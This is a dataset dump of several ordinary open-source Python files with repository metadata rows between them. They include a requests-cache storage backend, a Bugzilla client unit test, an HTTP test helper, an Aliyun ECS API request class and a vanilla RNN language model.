'Programming Language :: Python :: 3 :: Only',
],
project_urls={}
)
| 30.516484
| 68
| 0.656824
|
6c692ab9e6f916ef135ba2435de22443ab86b790
| 10,237
|
py
|
Python
|
requests_cache/backends/base.py
|
parkerhancock/requests-cache
|
e3ae526cba37a4ea2d8a48b05aaeff062847c644
|
[
"BSD-2-Clause"
] | 1
|
2021-05-27T17:25:45.000Z
|
2021-05-27T17:25:45.000Z
|
requests_cache/backends/base.py
|
parkerhancock/requests-cache
|
e3ae526cba37a4ea2d8a48b05aaeff062847c644
|
[
"BSD-2-Clause"
] | null | null | null |
requests_cache/backends/base.py
|
parkerhancock/requests-cache
|
e3ae526cba37a4ea2d8a48b05aaeff062847c644
|
[
"BSD-2-Clause"
] | null | null | null |
import pickle
import warnings
from abc import ABC
from collections import UserDict
from collections.abc import MutableMapping
from datetime import datetime
from logging import getLogger
from typing import Iterable, Iterator, Tuple, Union
from ..cache_control import ExpirationTime
from ..cache_keys import create_key, remove_ignored_params, url_to_key
from ..models import AnyRequest, AnyResponse, CachedResponse
from ..serializers import init_serializer
# Specific exceptions that may be raised during deserialization
DESERIALIZE_ERRORS = (AttributeError, ImportError, TypeError, ValueError, pickle.PickleError)
ResponseOrKey = Union[CachedResponse, str]
logger = getLogger(__name__)
class BaseCache:
"""Base class for cache implementations, which can also be used as in-memory cache.
See :ref:`advanced_usage:custom backends` for details on creating your own implementation.
"""
def __init__(
self,
*args,
include_get_headers: bool = False,
ignored_parameters: Iterable[str] = None,
**kwargs,
):
self.name: str = ''
self.redirects: BaseStorage = DictStorage()
self.responses: BaseStorage = DictStorage()
self.include_get_headers = include_get_headers
self.ignored_parameters = ignored_parameters
@property
def urls(self) -> Iterator[str]:
"""Get all URLs currently in the cache (excluding redirects)"""
for response in self.values():
yield response.url
def save_response(self, response: AnyResponse, key: str = None, expires: datetime = None):
"""Save response to cache
Args:
key: key for this response
response: response to save
expire_after: Time in seconds until this cache item should expire
"""
key = key or self.create_key(response.request)
cached_response = CachedResponse.from_response(response, expires=expires)
cached_response.request = remove_ignored_params(cached_response.request, self.ignored_parameters)
self.responses[key] = cached_response
def save_redirect(self, request: AnyRequest, response_key: str):
"""
Map a redirect request to a response. This makes it possible to associate many keys with a
single response.
Args:
request: Request object for redirect URL
response_key: Cache key which can be found in ``responses``
"""
self.redirects[self.create_key(request)] = response_key
def get_response(self, key: str, default=None) -> CachedResponse:
"""Retrieves response for `key` if it's stored in cache, otherwise returns `default`
Args:
key: Key of resource
default: Value to return if `key` is not in cache
"""
try:
if key not in self.responses:
key = self.redirects[key]
response = self.responses[key]
response.reset() # In case response was in memory and content has already been read
return response
except KeyError:
return default
except DESERIALIZE_ERRORS as e:
logger.error(f'Unable to deserialize response with key {key}: {str(e)}')
logger.debug(e, exc_info=True)
return default
def delete(self, key: str):
"""Delete a response or redirect from the cache, as well any associated redirect history"""
# If it's a response key, first delete any associated redirect history
try:
for r in self.responses[key].history:
del self.redirects[create_key(r.request, self.ignored_parameters)]
except (KeyError, *DESERIALIZE_ERRORS):
pass
# Then delete the response itself, or just the redirect if it's a redirect key
for cache in [self.responses, self.redirects]:
try:
del cache[key]
except KeyError:
pass
def delete_url(self, url: str):
"""Delete a cached response + redirects for ``GET <url>``"""
self.delete(url_to_key(url, self.ignored_parameters))
def bulk_delete(self, keys: Iterable[str]):
"""Remove multiple responses and their associated redirects from the cache"""
self.responses.bulk_delete(keys)
# Remove any redirects that no longer point to an existing response
invalid_redirects = [k for k, v in self.redirects.items() if v not in self.responses]
self.redirects.bulk_delete(set(keys) | set(invalid_redirects))
def clear(self):
"""Delete all items from the cache"""
logger.info('Clearing all items from the cache')
self.responses.clear()
self.redirects.clear()
def remove_expired_responses(self, expire_after: ExpirationTime = None):
"""Remove expired and invalid responses from the cache, optionally with revalidation
Args:
expire_after: A new expiration time used to revalidate the cache
"""
logger.info(
'Removing expired responses.'
+ (f'Revalidating with: {expire_after}' if expire_after else '')
)
keys_to_update = {}
keys_to_delete = []
for key, response in self._get_valid_responses(delete=True):
# If we're revalidating and it's not yet expired, update the cached item's expiration
if expire_after is not None and not response.revalidate(expire_after):
keys_to_update[key] = response
if response.is_expired:
keys_to_delete.append(key)
# Delay updates & deletes until the end, to avoid conflicts with _get_valid_responses()
logger.debug(f'Deleting {len(keys_to_delete)} expired responses')
self.bulk_delete(keys_to_delete)
if expire_after is not None:
logger.debug(f'Updating {len(keys_to_update)} revalidated responses')
for key, response in keys_to_update.items():
self.responses[key] = response
def remove_old_entries(self, *args, **kwargs):
msg = 'BaseCache.remove_old_entries() is deprecated; please use CachedSession.remove_expired_responses()'
warnings.warn(DeprecationWarning(msg))
self.remove_expired_responses(*args, **kwargs)
def create_key(self, request: AnyRequest, **kwargs) -> str:
"""Create a normalized cache key from a request object"""
return create_key(request, self.ignored_parameters, self.include_get_headers, **kwargs) # type: ignore
def has_key(self, key: str) -> bool:
"""Returns `True` if cache has `key`, `False` otherwise"""
return key in self.responses or key in self.redirects
def has_url(self, url: str) -> bool:
"""Returns `True` if cache has `url`, `False` otherwise. Works only for GET request urls"""
return self.has_key(url_to_key(url, self.ignored_parameters)) # noqa: W601
def keys(self, check_expiry=False) -> Iterator[str]:
"""Get all cache keys for redirects and valid responses combined"""
yield from self.redirects.keys()
for key, _ in self._get_valid_responses(check_expiry=check_expiry):
yield key
def values(self, check_expiry=False) -> Iterator[CachedResponse]:
"""Get all valid response objects from the cache"""
for _, response in self._get_valid_responses(check_expiry=check_expiry):
yield response
def response_count(self, check_expiry=False) -> int:
"""Get the number of responses in the cache, excluding invalid (unusable) responses.
Can also optionally exclude expired responses.
"""
return len(list(self.values(check_expiry=check_expiry)))
def _get_valid_responses(
self, check_expiry=False, delete=False
) -> Iterator[Tuple[str, CachedResponse]]:
"""Get all responses from the cache, and skip (+ optionally delete) any invalid ones that
can't be deserialized. Can also optionally check response expiry and exclude expired responses.
"""
invalid_keys = []
for key in self.responses.keys():
try:
response = self.responses[key]
if check_expiry and response.is_expired:
invalid_keys.append(key)
else:
yield key, response
except DESERIALIZE_ERRORS:
invalid_keys.append(key)
# Delay deletion until the end, to improve responsiveness when used as a generator
if delete:
logger.debug(f'Deleting {len(invalid_keys)} invalid/expired responses')
self.bulk_delete(invalid_keys)
def __str__(self):
"""Show a count of total **rows** currently stored in the backend. For performance reasons,
this does not check for invalid or expired responses.
"""
return f'Total rows: {len(self.responses)} responses, {len(self.redirects)} redirects'
def __repr__(self):
return f'<{self.__class__.__name__}(name={self.name})>'
class BaseStorage(MutableMapping, ABC):
"""Base class for backend storage implementations
Args:
secret_key: Optional secret key used to sign cache items for added security
salt: Optional salt used to sign cache items
serializer: Custom serializer that provides ``loads`` and ``dumps`` methods
"""
def __init__(
self,
serializer=None,
**kwargs,
):
self.serializer = init_serializer(serializer, **kwargs)
logger.debug(f'Initializing {type(self).__name__} with serializer: {self.serializer}')
def bulk_delete(self, keys: Iterable[str]):
"""Delete multiple keys from the cache. Does not raise errors for missing keys. This is a
basic version that subclasses should override with a more efficient backend-specific
version, if possible.
"""
for k in keys:
try:
del self[k]
except KeyError:
pass
def __str__(self):
return str(list(self.keys()))
class DictStorage(UserDict, BaseStorage):
"""A basic dict wrapper class for non-persistent storage"""
| 40.462451
| 113
| 0.654196
|
598cc5c8bff3bf2e2aa26b77d5e292ba6b6145c1
| 522
|
py
|
Python
|
tests/core/test_bugzilla.py
|
moisesguimaraes/trellozilla
|
09779fbc29df5896c895aaa30e8a49ac57b7c1fc
|
[
"Apache-2.0"
] | 2
|
2019-09-26T10:04:51.000Z
|
2021-01-28T16:18:31.000Z
|
tests/core/test_bugzilla.py
|
moisesguimaraes/trellozilla
|
09779fbc29df5896c895aaa30e8a49ac57b7c1fc
|
[
"Apache-2.0"
] | null | null | null |
tests/core/test_bugzilla.py
|
moisesguimaraes/trellozilla
|
09779fbc29df5896c895aaa30e8a49ac57b7c1fc
|
[
"Apache-2.0"
] | 1
|
2021-01-19T14:11:00.000Z
|
2021-01-19T14:11:00.000Z
|
import unittest
from unittest import mock
from trellozilla.core import bugzilla
class TestBugzilla(unittest.TestCase):
"""Tests for `trellozilla.core.bugzilla`."""
def test_get_client_api(self):
with mock.patch("bugzilla.Bugzilla") as trello_client_mock:
conf_mock = mock.Mock()
bugzilla.get_api_client(conf_mock)
trello_client_mock.assert_called_once_with(
conf_mock.bugzilla.url,
api_key=conf_mock.bugzilla.api_key,
)
| 26.1
| 67
| 0.666667
|
2ebc372b208427233b147f52a7f6450ab23534c5
| 1,832
|
py
|
Python
|
TestHelper.py
|
garethsb-sony/nmos-testing
|
2436972ff495c5942bb29cd0f440cb848eb04ccd
|
[
"Apache-2.0"
] | null | null | null |
TestHelper.py
|
garethsb-sony/nmos-testing
|
2436972ff495c5942bb29cd0f440cb848eb04ccd
|
[
"Apache-2.0"
] | null | null | null |
TestHelper.py
|
garethsb-sony/nmos-testing
|
2436972ff495c5942bb29cd0f440cb848eb04ccd
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2018 Riedel Communications GmbH & Co. KG
#
# Modifications Copyright 2018 British Broadcasting Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests
def ordered(obj):
if isinstance(obj, dict):
return sorted((k, ordered(v)) for k, v in obj.items())
if isinstance(obj, list):
return sorted(ordered(x) for x in obj)
else:
return obj
def compare_json(json1, json2):
"""Compares two json objects for equality"""
return ordered(json1) == ordered(json2)
def do_request(method, url, data=None):
"""Perform a basic HTTP request with appropriate error handling"""
try:
s = requests.Session()
req = None
if data is not None:
req = requests.Request(method, url, json=data)
else:
req = requests.Request(method, url)
prepped = req.prepare()
r = s.send(prepped)
return True, r
except requests.exceptions.Timeout:
return False, "Connection timeout"
except requests.exceptions.TooManyRedirects:
return False, "Too many redirects"
except requests.exceptions.ConnectionError as e:
return False, str(e)
except requests.exceptions.RequestException as e:
return False, str(e)
| 33.309091
| 75
| 0.663755
|
af2016a00dc3d30cfb5968d422e424c20d19378e
| 3,181
|
py
|
Python
|
aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/DescribePhysicalConnectionsRequest.py
|
liumihust/aliyun-openapi-python-sdk
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/DescribePhysicalConnectionsRequest.py
|
liumihust/aliyun-openapi-python-sdk
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/DescribePhysicalConnectionsRequest.py
|
liumihust/aliyun-openapi-python-sdk
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkecs.endpoint import endpoint_data
class DescribePhysicalConnectionsRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Ecs', '2014-05-26', 'DescribePhysicalConnections','ecs')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_ClientToken(self):
return self.get_query_params().get('ClientToken')
def set_ClientToken(self,ClientToken):
self.add_query_param('ClientToken',ClientToken)
def get_PageNumber(self):
return self.get_query_params().get('PageNumber')
def set_PageNumber(self,PageNumber):
self.add_query_param('PageNumber',PageNumber)
def get_PageSize(self):
return self.get_query_params().get('PageSize')
def set_PageSize(self,PageSize):
self.add_query_param('PageSize',PageSize)
def get_UserCidr(self):
return self.get_query_params().get('UserCidr')
def set_UserCidr(self,UserCidr):
self.add_query_param('UserCidr',UserCidr)
def get_ResourceOwnerAccount(self):
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self,ResourceOwnerAccount):
self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount)
def get_OwnerAccount(self):
return self.get_query_params().get('OwnerAccount')
def set_OwnerAccount(self,OwnerAccount):
self.add_query_param('OwnerAccount',OwnerAccount)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId)
def get_Filters(self):
return self.get_query_params().get('Filters')
def set_Filters(self,Filters):
for i in range(len(Filters)):
for j in range(len(Filters[i].get('Values'))):
if Filters[i].get('Values')[j] is not None:
self.add_query_param('Filter.' + str(i + 1) + '.Value.'+str(j + 1), Filters[i].get('Values')[j])
if Filters[i].get('Key') is not None:
self.add_query_param('Filter.' + str(i + 1) + '.Key' , Filters[i].get('Key'))
| 34.956044
| 102
| 0.747564
|
1d6fd137c4cf79bd554ca6c1b04cc88669bfa909
| 20,667
|
py
|
Python
|
lmp/model/_rnn.py
|
shangrex/language-model-playground
|
d3aaf768f6cd57c5c2b263da46a36ffd23fcd51b
|
[
"Beerware"
] | 9
|
2020-07-31T10:27:28.000Z
|
2021-12-23T05:58:03.000Z
|
lmp/model/_rnn.py
|
shangrex/language-model-playground
|
d3aaf768f6cd57c5c2b263da46a36ffd23fcd51b
|
[
"Beerware"
] | 10
|
2020-07-28T05:32:52.000Z
|
2022-03-04T06:36:23.000Z
|
lmp/model/_rnn.py
|
shangrex/language-model-playground
|
d3aaf768f6cd57c5c2b263da46a36ffd23fcd51b
|
[
"Beerware"
] | 20
|
2020-07-08T07:05:39.000Z
|
2021-09-22T07:20:46.000Z
|
r"""Vanilla RNN language model."""
import argparse
from typing import ClassVar, Dict, List, Optional
import torch
import torch.nn as nn
import torch.nn.functional as F
from lmp.model._base import BaseModel
from lmp.tknzr._base import BaseTknzr
class RNNModel(BaseModel):
r"""Vanilla RNN language model.
Use ``self.loss_fn`` for training and use ``self.pred`` for inference.
Both are depended on forward pass alogorithm ``self.forward``.
Parameters
==========
d_emb: int
Token embedding dimension.
Must be bigger than or equal to ``1``.
d_hid: int
Hidden dimension for Feed-Forward layers and RNN layers.
Must be bigger than or equal to ``1``.
kwargs: Dict, optional
Useless parameter.
Intently left for subclass parameters extension.
n_hid_lyr: int
Number of RNN layers.
Must be bigger than or equal to ``1``.
n_post_hid_lyr: int
Number of Feed-Forward layers after RNN layers.
All layers are paired with ReLU activatons except for the last one.
Must be bigger than or equal to ``1``.
n_pre_hid_lyr: int
Number of Feed-Forward layers before RNN layers.
All layers are paired with ReLU activatons.
Must be bigger than or equal to ``1``.
p_emb: float
Dropout probability for token embeddings.
Must satisfy ``0.0 <= p_emb <= 1.0``.
p_hid: float
Dropout probability for every hidden representations.
Must satisfy ``0.0 <= p_hid <= 1.0``.
tknzr: lmp.tknzr.BaseTknzr
Tokenizer instance with attributes ``pad_tkid`` and ``vocab_size``.
Attributes
==========
emb: torch.nn.Embedding
Token embedding lookup matrix.
Use token ids to lookup token embeddings.
emb_dp: torch.nn.Dropout
Token embedding dropout.
Drop embedding features with probability ``p_emb``.
hid: torch.nn.RNN
Vanilla RNN which encode temporal features.
Each time step's hidden state depends on current input and previous
hidden state.
Dropout temporal features with probability ``p_hid`` if
``n_hid_lyr > 1``.
model_name: ClassVar[str]
Model name is ``RNN``.
Used for command line argument parsing.
post_hid: torch.nn.Sequential
Rectified Feed-Forward layers which transform temporal features from
hidden dimension ``d_hid`` to embedding dimension ``d_emb``.
Drop rectified units with probability ``p_hid``.
pre_hid: torch.nn.Sequential
Rectified Feed-Forward layers which transform token embeddings from
embedding dimension ``d_emb`` to hidden dimension ``d_hid``.
Drop rectified units with probability ``p_hid``.
"""
model_name: ClassVar[str] = 'RNN'
def __init__(
self,
*,
d_emb: int,
d_hid: int,
n_hid_lyr: int,
n_post_hid_lyr: int,
n_pre_hid_lyr: int,
p_emb: float,
p_hid: float,
tknzr: BaseTknzr,
**kwargs: Optional[Dict],
):
super().__init__()
#######################################################################
# Required parameters section.
#######################################################################
# ---------------------------------------------------------------------
# Checking parameter `d_emb`.
if not isinstance(d_emb, int):
raise TypeError('`d_emb` must be an instance of `int`.')
if d_emb < 1:
raise ValueError('`d_emb` must be bigger than or equal to `1`.')
# Finish checking parameter `d_emb`.
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
# Checking parameter `d_hid`.
if not isinstance(d_hid, int):
raise TypeError('`d_hid` must be an instance of `int`.')
if d_hid < 1:
raise ValueError('`d_hid` must be bigger than or equal to `1`.')
# Finish checking parameter `d_hid`.
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
# Checking parameter `n_hid_lyr`.
if not isinstance(n_hid_lyr, int):
raise TypeError('`n_hid_lyr` must be an instance of `int`.')
if n_hid_lyr < 1:
raise ValueError(
'`n_hid_lyr` must be bigger than or equal to `1`.')
# Finish checking parameter `n_hid_lyr`.
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
# Checking parameter `n_post_hid_lyr`.
if not isinstance(n_post_hid_lyr, int):
raise TypeError('`n_post_hid_lyr` must be an instance of `int`.')
if n_post_hid_lyr < 1:
raise ValueError(
'`n_post_hid_lyr` must be bigger than or equal to `1`.'
)
# Finish checking parameter `n_post_hid_lyr`.
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
# Checking parameter `n_pre_hid_lyr`.
if not isinstance(n_pre_hid_lyr, int):
raise TypeError('`n_pre_hid_lyr` must be an instance of `int`.')
if n_pre_hid_lyr < 1:
raise ValueError(
'`n_pre_hid_lyr` must be bigger than or equal to `1`.'
)
# Finish checking parameter `n_pre_hid_lyr`.
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
# Checking parameter `p_emb`.
if not isinstance(p_emb, float):
raise TypeError('`p_emb` must be an instance of `float`.')
if not (0.0 <= p_emb <= 1.0):
raise ValueError(
'`p_emb` must be in the range from `0.0` to `1.0`.'
)
# Finish checking parameter `p_emb`.
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
# Checking parameter `p_hid`.
if not isinstance(p_hid, float):
raise TypeError('`p_hid` must be an instance of `float`.')
if not (0.0 <= p_hid <= 1.0):
raise ValueError(
'`p_hid` must be in the range from `0.0` to `1.0`.'
)
# Finish checking parameter `p_hid`.
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
# Checking parameter `tknzr`.
if not isinstance(tknzr, BaseTknzr):
raise TypeError('`tknzr` must be an instance of `BaseTknzr`.')
# Finish checking parameter `tknzr`.
# ---------------------------------------------------------------------
# Token embedding layer.
# Use token ids to lookup token embeddings.
# Input tensor : Batch of token ids.
# Input shape : `(B, S)`.
# Input dtype : `torch.int64`.
# Output tensor: Batch of token embeddings.
# Output shape : `(B, S, E)`.
# Output dtype : `torch.float32`.
self.emb = nn.Embedding(
num_embeddings=tknzr.vocab_size,
embedding_dim=d_emb,
padding_idx=tknzr.pad_tkid,
)
# Token embedding dropout layer.
# Drop embedding features with probability `p_emb`.
# Input tensor : Output of `self.emb`.
# Input shape : `(B, S, E)`.
# Input dtype : `torch.float32`.
# Output tensor: Batch of sparse token embeddings.
# Output shape : `(B, S, E)`.
# Output dtype : `torch.float32`.
self.emb_dp = nn.Dropout(p=p_emb)
# Rectified Feed-Forward layers which transform token embeddings from
# embedding dimension `d_emb` to hidden dimension `d_hid`.
# Drop rectified units with probability `p_hid`.
# Input tensor : Output of `self.emb_dp`.
# Input shape : `(B, S, E)`.
# Input dtype : `torch.float32`.
# Output tensor: Batch of sparse rectified token representation.
# Output shape : `(B, S, H)`.
# Output dtype : `torch.float32`.
pre_hid: List[nn.Module] = [
nn.Linear(in_features=d_emb, out_features=d_hid),
nn.ReLU(),
nn.Dropout(p=p_hid),
]
for _ in range(n_pre_hid_lyr - 1):
pre_hid.append(nn.Linear(in_features=d_hid, out_features=d_hid))
pre_hid.append(nn.ReLU())
pre_hid.append(nn.Dropout(p=p_hid))
self.pre_hid = nn.Sequential(*pre_hid)
# Vanilla RNN which encode temporal features.
# Each time step's hidden state depends on current input and previous
# hidden state.
# Dropout temporal features if `n_hid_lyr > 1`.
# Input tensor : Output of `self.pre_hid`.
# Input shape : `(B, S, H)`.
# Input dtype : `torch.float32`.
# Output tensor: Batch of recurrent token hidden states.
# Output shape : `(B, S, H)`.
# Output dtype : `torch.float32`.
self.hid: nn.Module
if n_hid_lyr == 1:
self.hid = nn.RNN(
input_size=d_hid,
hidden_size=d_hid,
batch_first=True,
)
else:
self.hid = nn.RNN(
input_size=d_hid,
hidden_size=d_hid,
num_layers=n_hid_lyr,
dropout=p_hid,
batch_first=True,
)
# Rectified Feed-Forward layers which transform temporal features from
# hidden dimension `d_hid` to embedding dimension `d_emb`.
# Drop rectified units with probability `p_hid`.
# Input tensor : Output of `self.hid`.
# Input shape : `(B, S, H)`.
# Input dtype : `torch.float32`.
# Output tensor: Batch of sparse rectified next token embeddings.
# Output shape : `(B, S, E)`.
# Output dtype : `torch.float32`.
post_hid: List[nn.Module] = []
for _ in range(n_post_hid_lyr - 1):
post_hid.append(nn.Dropout(p=p_hid))
post_hid.append(nn.Linear(in_features=d_hid, out_features=d_hid))
post_hid.append(nn.ReLU())
post_hid.append(nn.Dropout(p=p_hid))
post_hid.append(nn.Linear(in_features=d_hid, out_features=d_emb))
self.post_hid = nn.Sequential(*post_hid)
# Calculate cross entropy loss for all non-padding tokens.
self.loss_ignore_padding = nn.CrossEntropyLoss(
ignore_index=tknzr.pad_tkid
)
def forward(self, batch_prev_tkids: torch.Tensor) -> torch.Tensor:
r"""Perform forward pass.
Forward pass algorithm is structured as follow:
#. Input batch of previous token ids.
(shape: ``(B, S)``)
#. Use batch of previous token ids to perform token embeddings lookup
on ``self.emb``.
(shape: ``(B, S, E)``)
#. Use ``self.emb_dp`` to drop some features in token embeddings.
(shape: ``(B, S, E)``)
#. Use ``self.pre_hid`` to transform token embeddings from embedding
dimension ``E`` to hidden dimension ``H``.
(shape: ``(B, S, H)``)
#. Use ``self.hid`` to encode temporal features.
(shape: ``(B, S, H)``)
#. Use ``self.post_hid`` to transform temporal features from hidden
dimension ``H`` to embedding dimension ``E``.
(shape: ``(B, S, E)``)
#. Find the most possible next token id in embedding matrix
``self.emb`` using inner product.
This reduce parameters since we share weight on token embedding and
output projection.
(shape: ``(B, S, V)``)
#. Return logits.
Used with ``self.pred`` to convert logit into prediction.
Used wtih ``self.loss_fn`` to perform optimization.
(shape: ``(B, S, V)``)
Parameters
==========
batch_prev_tkids: torch.Tensor
Batch of previous token ids encoded by
:py:class:`lmp.tknzr.BaseTknzr` subclass instance.
``batch_prev_tkids`` has shape ``(B, S)`` and
``dtype == torch.int64``.
Returns
=======
torch.Tensor
Next token logits for each token id in batch.
Logits has shape ``(B, S, V)`` and ``dtype == torch.float32``.
"""
# Token embedding lookup.
# Input shape: `(B, S)`.
# Output shape: `(B, S, E)`.
batch = self.emb(batch_prev_tkids)
# Token embedding dropout.
# Input shape: `(B, S, E)`.
# Output shape: `(B, S, E)`.
batch = self.emb_dp(batch)
# Transform from embedding dimension to hidden dimension.
# Input shape: `(B, S, E)`.
# Output shape: `(B, S, H)`.
batch = self.pre_hid(batch)
# Encode temporal features.
# Input shape: `(B, S, H)`.
# Output shape: `(B, S, H)`.
batch, _ = self.hid(batch)
# Transform from hidden dimension to embedding dimension.
# Input shape: `(B, S, H)`.
# Output shape: `(B, S, E)`.
batch = self.post_hid(batch)
# Transform from embedding dimension to vocabulary dimension by
# multiplying transpose of embedding matrix.
# Reduce model parameters by sharing embedding matrix with output.
# Input shape: `(B, S, E)`.
# Output shape: `(B, S, V)`.
return batch @ self.emb.weight.transpose(0, 1)
def loss_fn(
self,
batch_next_tkids: torch.Tensor,
batch_prev_tkids: torch.Tensor,
) -> torch.Tensor:
r"""Calculate language model training loss.
Use forward pass to get logits and then use cross-entropy to calculate
next token prediction loss.
Use teacher forcing to implement this method.
Parameters
==========
batch_next_tkids: torch.Tensor
Prediction targets.
Batch of next token ids encoded by
:py:class:`lmp.tknzr.BaseTknzr` subclass instance.
``batch_next_tkids`` has same shape and ``dtype`` as
``batch_prev_tkids``.
batch_prev_tkids: torch.Tensor
Batch of previous token ids encoded by
:py:class:`lmp.tknzr.BaseTknzr` subclass instance.
``batch_prev_tkids`` has shape ``(B, S)`` and
``dtype == torch.int64``.
Returns
=======
torch.Tensor
Average next token prediction loss.
Returned tensor has shape ``(1)`` and ``dtype == torch.float32``.
"""
# Forward pass.
# Input shape: `(B, S)`.
# Output shape: `(B, S, V)`.
logits = self(batch_prev_tkids)
# Reshape logits to calculate loss.
# Input shape: `(B, S, V)`.
# Output shape: `(BxS, V)`.
logits = logits.reshape(-1, self.emb.num_embeddings)
# Reshape target to calculate loss.
# Input shape: `(B, S)`.
# Output shape: `(BxS)`.
batch_next_tkids = batch_next_tkids.reshape(-1)
# Loss function of next token prediction.
# All logits are used since we use teacher forcing to optimize.
# Logits tensor: Batch of next token prediction logits.
# Logits shape : `(BxS, V)`.
# Logits dtype : `torch.float32`.
# Target tensor: Batch of next token prediction target.
# Target shape : `(BxS)`.
# Target dtype : `torch.int64`.
# Output tensor: Average next tokens prediction loss.
# Output shape : `(1)`.
# Output dtype : `torch.float32`.
return self.loss_ignore_padding(logits, batch_next_tkids)
def pred(self, batch_prev_tkids: torch.Tensor) -> torch.Tensor:
r"""Next token prediction.
Use forward pass ouput logits to choose the most possible token id
from vocabulary as next token.
Parameters
==========
batch_prev_tkids: torch.Tensor
Batch of previous token ids encoded by
:py:class:`lmp.tknzr.BaseTknzr` subclass instance.
``batch_prev_tkids`` has shape ``(B, S)`` and
``dtype == torch.int64``.
Returns
=======
torch.Tensor
Softmax predicition for next token.
Return tensor has shape ``(B, S, V)`` and
``dtype == torch.float32``.
"""
# Forward pass.
# Input shape: `(B, S)`.
# Output shape: `(B, S, V)`.
logits = self(batch_prev_tkids)
# Convert logits to probabilities using softmax.
# Input tensor : Batch of next token prediction logits.
# Input shape : `(B, S, V)`.
# Input dtype : `torch.float32`.
# Output tensor: Batch of next token prediction probabilities.
# Output shape : `(B, S, V)`.
# Output dtype : `torch.float32`.
return F.softmax(logits, dim=-1)
@staticmethod
def train_parser(parser: argparse.ArgumentParser) -> None:
r"""Training vanilla RNN language model CLI arguments parser.
Parameters
==========
parser: argparse.ArgumentParser
Parser for CLI arguments.
See Also
========
lmp.model.BaseModel.train_parser
Training language model CLI arguments.
lmp.script.train_model
Language model training script.
Examples
========
>>> import argparse
>>> from lmp.model import RNNModel
>>> parser = argparse.ArgumentParser()
>>> RNNModel.train_parser(parser)
>>> args = parser.parse_args([
... '--batch_size', '32',
... '--beta1', '0.9',
... '--beta2', '0.99',
... '--ckpt_step', '1000',
... '--dset_name', 'wikitext-2',
... '--eps', '1e-8',
... '--exp_name', 'my_exp',
... '--log_step', '200',
... '--lr', '1e-4',
... '--max_norm', '1',
... '--n_epoch', '10',
... '--tknzr_exp_name', 'my_tknzr_exp',
... '--ver', 'train',
... '--wd', '1e-2',
... '--d_emb', '100',
... '--d_hid', '300',
... '--n_hid_lyr', '2',
... '--n_post_hid_lyr', '1',
... '--n_pre_hid_lyr', '1',
... '--p_emb', '0.1',
... '--p_hid', '0.1',
... ])
>>> args.d_emb == 100
True
>>> args.d_hid == 300
True
>>> args.n_hid_lyr == 2
True
>>> args.n_post_hid_lyr == 1
True
>>> args.n_pre_hid_lyr == 1
True
>>> args.p_emb == 0.1
True
>>> args.p_hid == 0.1
True
"""
# Load common arguments.
BaseModel.train_parser(parser=parser)
# Required arguments.
group = parser.add_argument_group('model arguments')
group.add_argument(
'--d_emb',
help='Token embedding dimension.',
required=True,
type=int,
)
group.add_argument(
'--d_hid',
help='Hidden dimension for Feed-Forward layers and RNN layers.',
required=True,
type=int,
)
group.add_argument(
'--n_hid_lyr',
help='Number of RNN layers.',
required=True,
type=int,
)
group.add_argument(
'--n_post_hid_lyr',
help='Number of Feed-Forward layers after RNN layers.',
required=True,
type=int,
)
group.add_argument(
'--n_pre_hid_lyr',
help='Number of Feed-Forward layers before RNN layers.',
required=True,
type=int,
)
group.add_argument(
'--p_emb',
help='Dropout probability for token embeddings.',
required=True,
type=float,
)
group.add_argument(
'--p_hid',
help='Dropout probability for hidden representation.',
required=True,
type=float,
)
| 36.578761
| 79
| 0.515217
|
80885fd9ef1392e5c4fcc253964789d5546497fb
| 326,332
|
py
|
Python
|
pandas/core/generic.py
|
Web-Application-Project/Main-Project
|
9183396ec9ab660a49bc6bd41cfd2bbc98f54db7
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
pandas/core/generic.py
|
Web-Application-Project/Main-Project
|
9183396ec9ab660a49bc6bd41cfd2bbc98f54db7
|
[
"PSF-2.0",
"Apache-2.0",
